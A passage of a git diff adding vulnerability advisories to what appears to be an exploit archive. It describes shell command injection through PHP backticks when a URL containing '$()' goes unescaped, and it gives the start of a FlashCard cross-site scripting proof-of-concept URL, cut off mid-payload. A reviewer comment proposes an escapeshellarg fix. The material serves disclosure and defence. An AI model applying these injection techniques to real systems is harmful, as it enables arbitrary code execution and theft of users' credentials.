+--user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn
+--js-can-open-windows=off --url=\"$url\" --out-format=$format
+--out=$tempfile"; ? OS shell command injection
+}
+...
+$out = `$command`; ? execute $command as shell command
+
+"PHP supports one execution operator: backticks (``). Note that these are
+not single-quotes! PHP will attempt to execute the contents of the
+backticks as a shell command." -
+http://www.php.net//manual/en/language.operators.execution.php
+
+"$url" is failed to escape "$()" in "$command" which is result in arbitrary
+code execution.
diff --git a/platforms/php/webapps/33870.txt b/platforms/php/webapps/33870.txt
new file mode 100755
index 000000000..7f7c23603
--- /dev/null
+++ b/platforms/php/webapps/33870.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/39648/info
+
+FlashCard is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+FlashCard 2.6.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/flashcard/stateless/cPlayer.php?id=">
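Review bot: The vulnerability analysis identifies the unescaped `$url` in `$command` but never states the fix, and the `preg_replace` whitelist it quotes is an RFC 3986 character filter, not a shell filter — `$`, `(` and `)` are legitimate URL characters, so tightening that regex is not a reliable remediation. The correct fix in `serveWebshot()` is to quote the value at the point it enters the command string, `--url=" . escapeshellarg($url) . "` in both `$command` branches (and likewise for any other interpolated value), so the backtick execution on the `$out = \`$command\`;` line never sees unquoted user input; a sentence saying so would make the advisory actionable for the themes and plugins it lists. Separately, the quoted source line `define ('WEBSHOT_ENABLED', true);` contradicts the earlier note that WebShot is disabled by default; if the define was altered for the PoC environment, say so, otherwise the default-off claim should be corrected, since it determines how many of the listed installs are exposed.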